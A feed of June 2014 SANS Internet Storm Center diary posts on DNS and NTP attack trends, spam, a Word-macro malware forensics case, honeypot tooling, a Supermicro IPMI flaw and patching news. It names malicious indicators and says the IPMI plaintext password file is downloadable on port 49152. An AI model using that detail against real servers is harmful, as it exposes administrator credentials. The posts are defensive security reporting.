Alerts

Do you have some DNS requests/replies you could share?, (Wed, Jun 25th)

Latest Alerts - Tue, 06/24/2014 - 18:03

Looking at DNS traffic it looks like it has been a busy month, but traffic seems to have dropped off. 


port 53 as a target has dropped off and during June there was an increase in traffic with a source port of 53. Something that we've seen on various IDS.  We either see one of two types of packets.  A request for any for a particular domain with the packet size set to 65535 and a spoofed source IP (i.e. the target).  So that accounts for the traffic to port 53.  

The second types of requests we see is from port 53.  Typically with a random source ports and typically to a number of servers in the target network.  The only thing that changes is often the queryid.  So these are likely attempts to poison the cache.  

The third type we see are DNS requests to check for open resolvers and a final type of query we see a lot of are DNS queries with HTTP elements in the traffic.  

There are a few things I'm interested in.  What caused the drop off for port 53 as the target.  What DNS queries are you seeing targetting your environment?  and if you can share, I'd be interested in the actual request itself.  

Regards

Mark H

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Wednesday, June 25th 2014 http://isc.sans.edu/podcastdetail.html?id=4037, (Wed, Jun 25th)

Latest Alerts - Tue, 06/24/2014 - 17:49
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Spam, talk about false advertising, (Wed, Jun 25th)

Latest Alerts - Tue, 06/24/2014 - 17:38

SPAM SPAM SPAM,  It never fails to entertain.  

Like most of you I get my fair share of SPAM and like a number of you I will happily click links (not a recommendation) and follow the little yellow brick road to whatever malware or "sales" opportunity presents itself.  This one was just a bit more random than others I've received lately.  


A quote for a home security system, great I need one of those the dog is just not interested in chasing away strangers that walk up to the house.  Following the link I end up on the following page, after a redirect from the libbean page. 

Ok, not quite the home security system I was hoping for,  but I like a game as much as the next guy.  Unfortunately hitting the "download for free" button I didn't get the promised flappy birds, but ended up here instead.

 

Now I don't know if Vox software is just a random landing or the SPAM run was commissioned. If the latter there are organisations that have no problem with using SPAM for "legitimate" advertising or they are just not aware.  Not quite sure which is worse.  

So every now and then SPAM does have some entertainment value, at least to me, didn't get my home security system I was promised though, nor fun game to play, ah well. 

Cheers

Mark H

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

NTP DDoS Counts Have Dropped, (Tue, Jun 24th)

Latest Alerts - Tue, 06/24/2014 - 13:49

I was poking around the usual online rags and found a piece on Threat Post. [1]  Mike Mimoso was highlighting the decline of the NTP DDoS hole found earlier in the year.  The ISC covered it in our diary a few months back.  

NTP Reflection Attack 
Ongoing NTP Amplification Attacks
NTP Reflection Attacks Continue

So, I went poking through the port data and noticed a good correlation to the Threat Post story.  The numbers indicate a sharp decrease in vulnerable systems for the NTP monlist issue.   I'd like to suggest that while pundits are citing slow progress for patching Heartbleed, that in actuality, the Heartbleed issue is responsible for the sudden change.  The month of May showed an extensive effort for patching and truing up patch levels because of Heartbleed.  This effort likely assisted in the NTP issue being patched along with it.  The following graph was taken from ISC data gathered here:

https://isc.sans.edu/port.html?&port=123

Feel free to share your thoughts on this one.

[1] http://threatpost.com/dramatic-drop-in-vulnerable-ntp-servers-used-in-ddos-attacks/106835

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Tuesday, June 24th 2014 http://isc.sans.edu/podcastdetail.html?id=4035, (Tue, Jun 24th)

Latest Alerts - Mon, 06/23/2014 - 19:19
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Tuesday, June 24th 2014 http://isc.sans.edu/podcastdetail.html?id=4035, (Tue, Jun 24th)

Latest Alerts - Mon, 06/23/2014 - 19:19
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Microsoft Interflow announced today at 26th FIRST conference, (Mon, Jun 23rd)

Latest Alerts - Mon, 06/23/2014 - 08:36

Microsoft announced a private preview of Microsoft Interflow today in timing with the 26th FIRST Conference in Boston. While its not available for general release yet this is the first public announcement of a project I've been tracking internally for awhile (I work at MSFT). Be patient, your opportunity is coming, this is good news for the DFIR community. Microsoft Interflow is a security and threat information exchange platform for professionals working in cybersecurity and allows collaboration for a collectively stronger ecosystem, action prioritization through automation, and integration via plug-in architecture. There's a write-up on the benefits as well as an FAQ so you can learn more. Microsoft Interflow, as security automation platform for the exchange of security and threat information, is based on the STIX (Structured Threat Information eXpression), TAXII (Trusted Automated eXchange of Indicator Information), and CyBox (Cyber Observable eXpression standards) specifications. This is all good news as it means that we're getting closer to general release.

Russ McRee | @holisticinfosec

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Microsoft Interflow announced today at 26th FIRST conference, (Mon, Jun 23rd)

Latest Alerts - Mon, 06/23/2014 - 08:36

Microsoft announced a private preview of Microsoft Interflow today in timing with the 26th FIRST Conference in Boston. While its not available for general release yet this is the first public announcement of a project I've been tracking internally for awhile (I work at MSFT). Be patient, your opportunity is coming, this is good news for the DFIR community. Microsoft Interflow is a security and threat information exchange platform for professionals working in cybersecurity and allows collaboration for a collectively stronger ecosystem, action prioritization through automation, and integration via plug-in architecture. There's a write-up on the benefits as well as an FAQ so you can learn more. Microsoft Interflow, as security automation platform for the exchange of security and threat information, is based on the STIX (Structured Threat Information eXpression), TAXII (Trusted Automated eXchange of Indicator Information), and CyBox (Cyber Observable eXpression standards) specifications. This is all good news as it means that we're getting closer to general release.

Russ McRee | @holisticinfosec

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Monday, June 23rd 2014 http://isc.sans.edu/podcastdetail.html?id=4033, (Mon, Jun 23rd)

Latest Alerts - Sun, 06/22/2014 - 18:13
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

OfficeMalScanner helps identify the source of a compromise, (Sun, Jun 22nd)

Latest Alerts - Sat, 06/21/2014 - 21:24

While working a recent forensics case I had the opportunity to spread the proverbial wings a bit and utilize a few tools I had not prior.
In the midst of building my forensic timeline I set out to determine the initial attack vector, operating on the assumption that it was either web-based content via a malicious ad or a site compromised with a web exploit kit, or was a malicious link or document attachment via email. One interesting variable stood out while reviewing the victim's PST file. Her company was in the midst of hiring, seeking candidates for a few positions, and was receiving numerous emails with resume attachments, both PDF and DOC/DOCX. I had already discovered the primary malware compromise of the victim's system so I simply needed to see if there was a malicious email that had arrived prior based on time stamps. One particular email with a Word doc attached stood right out as it arrived at 12:23am on the same day of the malware compromise later at noon. Antimalware detection immediately identified the attachment as TrojanDownloader:W97M/Ledod.A. This alleged resume attachment was also for a John Cena, which cracked me up as I am indeed familiar with the WWE professional wrestler of the same name. Unfortunately, technical details for W97M/Ledod.A were weak at best and all I had to go from initially was "this trojan can download and run other malware or potentially unwanted software onto your PC." Yeah, thanks for that. What is a poor forensicator to do? Frank Boldewin's (Reconsructer.org) OfficeMalScanner to the rescue! This tool works like a charm when you want a quick method to scan for shellcode and encrypted PE files as well as pulling macro details from a nasty Office documents. As always, when you choose to interact with mayhem, it's best to do so in an isolated environment; I run OfficeMalScanner on Windows 7 virtual machine. If you just run OfficeMalScanner with out defining any parameters, it kindly dumps options for you as seen in Figure 1.

Figure 1

For this particular sample, when I ran OfficeMalScanner.exe "John Cena Resume.doc" scan the result "No malicious traces found in this file!" was returned. As the tool advised me to do, I ran OfficeMalScanner.exe "John Cena Resume.doc" info as well and struck pay dirt as seen in Figure 2.

Figure 2

When I opened ThisDocument from C:\tools\OfficeMalScanner\JOHN CENA RESUME.DOC-Macros I was treated to the URL and executable payload I was hoping for as seen in Figure 3.

Figure 3

A little virustotal.com and urlquery.net research on dodevelopments.com told me everything I needed to know, pure Lithuanian evil in the form of IP address 5.199.165.239.  
A bit of trekking through all the malicious exe's known to be associated with that IP address and voila, I had my source.

See Jared Greenhill's writeup on these same concepts at EMC's RSA Security Analytics Blog and our own Lenny Zeltser's Analyzing Malicious Documents Cheat Sheet where I first learned about OfficeMalScanner. Prior related diaries also include Decoding Common XOR Obfuscation in Malicious Code and Analyzing Malicious RTF Files Using OfficeMalScanner's RTFScan (Lenny is El Jefe).

I hope to see some of you at SANSFIRE 2014. I'll be there for the Monday evening State of the Internet Panel Discussion at 7:15 and will present C3CM Defeating the Command, Control, and Communications of Digital Assailants on Tuesday evening at 8:15.

Russ McRee | @holisticinfosec

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

New tool: kippo-log2db.pl, (Fri, Jun 20th)

Latest Alerts - Fri, 06/20/2014 - 13:01

I've been running kippo for several years now on a couple of honeypots that I have around and when I started I was just logging to the text logs that kippo can create.  Since then, kippo now supports logging directly to a MySQL database and some other folks (especially Ioannis “Ion” Koniaris at bruteforce.gr) have created some nice tools to generate reports from kippo data.  These tools expect the data to be in the kippo MySQL database schema.  Having logged several years worth of stuff to the text log files, I didn't want to lose all that data, but I did want to be able to take advantage of some of the neat tools that Ion has developed, so I needed a way to get that data from the text logs to the supported db schema.  Now Ion had created a script that he called Kippo2MySQL, but that converted things to his own schema and lost some data in the process.  Using that as inspiration, however, I have created a script that will read the kippo text logs and populate a kippo database (using the same schema that kippo can now log to directly).  The only hitch that I discovered is that when kippo is logging to text logs and restarts, it doesn't maintain unique session ids, it starts over again from 1.  This caused me have to make a small change to the sessions table.  I had to change the primary key from ID to (ID,STARTTIME).  Fortunately, I haven't had an collisions where multiple sessions with the same id actually had ttylogs which is where things might get a bit sketchy.  This was accomplished with

mysql> alter table sessions drop primary key, add primary key(id,starttime);

yielding

mysql> show create table sessions\G *************************** 1. row *************************** Table: sessions Create Table: CREATE TABLE `sessions` ( `id` char(32) NOT NULL, `starttime` datetime NOT NULL, `endtime` datetime DEFAULT NULL, `sensor` int(4) NOT NULL, `ip` varchar(15) NOT NULL DEFAULT '', `termsize` varchar(7) DEFAULT NULL, `client` int(4) DEFAULT NULL, PRIMARY KEY (`id`,`starttime`), KEY `starttime` (`starttime`,`sensor`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 1 row in set (0.01 sec)

I've imported about 800K login attempts and can now play with kippo-graph or (soon, I haven't had the chance yet) kippo2elasticsearch.  The script can be found here though I have one small issue that I'll try to fix shortly, I think it is printing out too many #'s, I set it to print out 1 every 10,000 lines it reads from the log files and it seems like I'm getting way more than that, but that is a minor annoyance, maybe I'll just add a switch to turn that off later.  In the meantime, enjoy and if you find any problems or have ideas for improvement, let me know either in the comments or by e-mail at my address below.

References:

http://handlers.sans.org/jclausing/kippo-log2db.pl

---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Friday, June 20th 2014 http://isc.sans.edu/podcastdetail.html?id=4031, (Fri, Jun 20th)

Latest Alerts - Thu, 06/19/2014 - 18:37
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

New Supermicro IPMI/BMC Vulnerability, (Thu, Jun 19th)

Latest Alerts - Thu, 06/19/2014 - 13:52

A new vulnerability has been released by the CARI.net team regarding Supermicro’s implementation of IPMI/BMC for management.  The vulnerability involves a plaintext password file available for download simply by connecting to the specific port, 49152.  One of our team has tested this vulnerability, and it works like a champ, so let’s add another log to the fire and spread the good word.  The CARI.net team has a great writeup on the vulnerability linked below:

http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/


Much thanx to the Zach at CARI.net for the heads-up.

tony d0t carothers --gmail

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

WordPress and Security, (Thu, Jun 19th)

Latest Alerts - Thu, 06/19/2014 - 08:35

The state of the systems we use in our day to day lives, typically outside our place of business, is ours to use and abuse as we see fit.  As such, we are also responsible for the security of said systems, and one of the oft overlooked is WordPress. The WordPress application is used by many SOHO users, and is as vulnerable to attack as anything out there today.  WordPress can be be secured, and with a bit of effort and guidance, fairly easily.  The WordPress.Org site has a great hardening guide for WordPress that covers most of the aspects of security and bringing it to their application. http://codex.wordpress.org/Hardening_WordPress


If the instance of WordPress is running on a shared server, as most are, then working with the local hosting company may be necessary if they are behind on patching, updating, etc.  If their host is compromised, then everything you do for your instance of WordPress can be easily undermined at the OS level.  If you choose to use tools, such as Metasploit or ZAP to test your application, ensure it is done within the confines of the User Agreement in place for your hosting site.  

tony d0t carothers --gmail

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Thursday, June 19th 2014 http://isc.sans.edu/podcastdetail.html?id=4029, (Thu, Jun 19th)

Latest Alerts - Wed, 06/18/2014 - 18:12
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Thursday, June 19th 2014 http://isc.sans.edu/podcastdetail.html?id=4029, (Thu, Jun 19th)

Latest Alerts - Wed, 06/18/2014 - 18:12
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Windows XP, slow to die :-( , (Wed, Jun 18th)

Latest Alerts - Wed, 06/18/2014 - 05:12

After traveling around the past few months in various countries it looks like getting rid of Windows XP is going to take quite a while.  It is probably due to the fact that it has expired that I noticed it more than usual, but XP is certainly everywhere.  You see it at airports on display boards, Point of Sale systems. In one overseas country the computers in customs as well as the railway displays and control systems and hospitals. 

Having obsolete operating systems in a corporate environment is bad enough, there are still many organisations that utilise XP internally.  However as part of critical infrastructure it worries me slightly more.  Now most of us can't do much outside of our little sphere of influence, but it is time for the operating system to go.  

So if junior needs something to do over the next few weeks set them a challenge. Identify all remaining XP devices connected to the network.  Categorise them into real XP and embedded XP ( Still some support available for those).  Then develop a strategy to get rid of them.  

If getting rid of them is not an option and there will those of you in that situation, at least look for ways of protecting them a bit better. Consider network segmentation, application whitelisting, endpoint solutions (some will still work on XP).  As an absolute minimum at least know where they are and how they are being used.

Seek, identify and remove away.

Mark H  

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

VMSA-2014-0006.2 updates OpenSSL libraries in VMWare, (Wed, Jun 18th)

Latest Alerts - Wed, 06/18/2014 - 04:30

An update was released today addressing the OpenSSL issues in VMWare products. Libraries have been updated to 0.9.8za and 1.0.1h to fix issues.   

You'll want to evaluate and apply the updates as appropriate.  

Mark H

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Wednesday, June 18th 2014 http://isc.sans.edu/podcastdetail.html?id=4027, (Wed, Jun 18th)

Latest Alerts - Tue, 06/17/2014 - 17:14
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Bro 2.3 released - new here: http://blog.bro.org/2014/06/bro-23-release.html, release notes here: http://www.bro.org/sphinx-git/install/release-notes.html, (Tue, Jun 17th)

Latest Alerts - Tue, 06/17/2014 - 15:46

=============== Rob VandenBrink Metafore

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts
Syndicate content